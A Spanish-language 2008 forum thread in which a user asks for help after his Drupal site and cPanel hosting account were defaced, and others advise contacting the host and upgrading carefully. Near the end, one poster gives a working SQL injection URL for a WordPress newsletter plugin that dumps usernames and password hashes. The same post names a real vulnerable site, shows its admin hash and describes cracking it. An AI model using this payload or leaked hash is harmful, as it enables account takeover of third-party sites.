Sv Community El Salvador
Soporte y Tecnología => Diseño & Webmaster Corner => Mensaje iniciado por: Phsyckr en febrero 19, 2008, 04:49:55 pm
-
Fijese que hoy no se que me dio de venirme temprano de la School y fijense que solo me vine a topar con que mi pagina habia sido hackeada
(http://img526.imageshack.us/img526/7251/hackeadozn3.th.png) (http://img526.imageshack.us/my.php?image=hackeadozn3.png)
eso fue lo que me pusieron y pues la ya cambie el index pero sigue asi uso drupal
mi url es www.ciudadbarrios.org (http://www.ciudadbarrios.org)
y lo que no puedo ahora es entrar al cpanel me sale la nota de el hack
-
yo si puedo entrar :D
(http://img162.imageshack.us/img162/7199/webbv0.th.jpg) (http://img162.imageshack.us/my.php?image=webbv0.jpg)
Volve a intentar, talvez ya furula
-
También entré :huh:
-
Jijiji yo tambien pude entrar , solo fue un fake a lo mejor :
(http://img85.imageshack.us/img85/4676/14347981po1.th.jpg) (http://img85.imageshack.us/img85/4676/14347981po1.jpg)
-
si eske a eso si puedo osea ya lo arregle con lo que estoy trabado en con lo de el cpanel y el fantastico y miren alguien aqui ya a actualizado a Drupal 6
-
eso deberias de hablarlo con la empresa que te ofrece el hosting, ya que no es el drupal el que te tomaron sino el cpanel y eso si ya lo veo algo serio
-
eso deberias de hablarlo con la empresa que te ofrece el hosting, ya que no es el drupal el que te tomaron sino el cpanel y eso si ya lo veo algo serio
Deberias ver se es problema general de la empresa que te ofrece el hosting o si solamente tu web ha sido afectada... contactalos, ellos te pueden hechar la mano :thumbsup:
-
mmmm pues fijese que uso los servicios de samancanetworks y pues la pagina de ellos esta a 100% y como no tienen lista de cliente no puedo verifacar si solo la mia fue afectada
-
contactalos directamente por telefono mejor o el soporte que ellos ofrescan, nose
-
el ataque no fue a tu pag si no que fue a los server de salamanca network desgracia de server esos y mas con las vulnerabilidades q dejan
-
yo tambien tengo mi sitio ahi y me lo jodieron no puedo arreglar nada por el cpanel esta muerto... ya les mande su respectiva puteada a los de salamanca... deberias hacer lo mismo
-
miren fijense que ahorita tengo el Drupal 5.3 y pues queria pasar al 6 porq se supone da mas rendimiento pero mi consulta es osea todo de funcionar: los modulos que tengo instalados el skin o theme no se si alguien aki ya lo ha hecho
-
no es seguro que todo funcione, los modulos y los themes son para versiones en especifico, de donde descargastes el theme y modulos podes documentarte si son funcionales en la version 6 de drupal, yo te aconsejo que esa actualizacion la hagas en local primero (appserv te puede ayudar) para mayor seguridad y luego lo hagas ya en tu sitio en produccion
-
miren fijense que ahorita tengo el Drupal 5.3 y pues queria pasar al 6 porq se supone da mas rendimiento pero mi consulta es osea todo de funcionar: los modulos que tengo instalados el skin o theme no se si alguien aki ya lo ha hecho
Problema de Salamanca man, que te hackeen cPanel ya es algo gravísimo.
Casí que todos los días hay updates para cPanel/WHM.
-
se las pondre asi de facil
ahora q version de drupla usabas ??? usas algun otro script aparte de ese ? plugin ? o alguna otra cosa ?
por un simple plugin t pueden joder rapido........
drupal tiene muchos exploits y si no actualizas a lo mas reciente entonces t agarran.
mira t pondre esto por ejemplo
---------------------------------------------------------------------------------------------
lo llamaremos lammer en accion
atakamos un inche plugin de wordpress ...... chero07 t avise d un su problema similar q tenia
buscas un exploit
wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users
luego vas a una pagina vulnerable ....
http://www.minkando.org/
ahora "juakeas" si lo quieres llamar asi
y t dan esto
|admin|42fea7227a266694a4941a0979c97d10|
y guala ya tienes el pass ahora vas a
http://passcracking.com/index.php
y pones la md5 d wordpress y t esperas entre 1 a 3 semanas para q las tablas de rainbowcrack crackean la md5, si no usas cain o algun otro progama para ello.
si la pass tiene unas 6 letras en unos 3 dias t la jukean.
--------------------------------------------------------------------
ahora es porq les digo q tienen q tener actualizados sus scripts, plugin y todo eso.
buieno aparte erroraso de tu servidor
----------------------------------------
por cierto no vallan a da;ar la pagina q puse porejemplo q aun no cambian el password y avise hace un par d dias.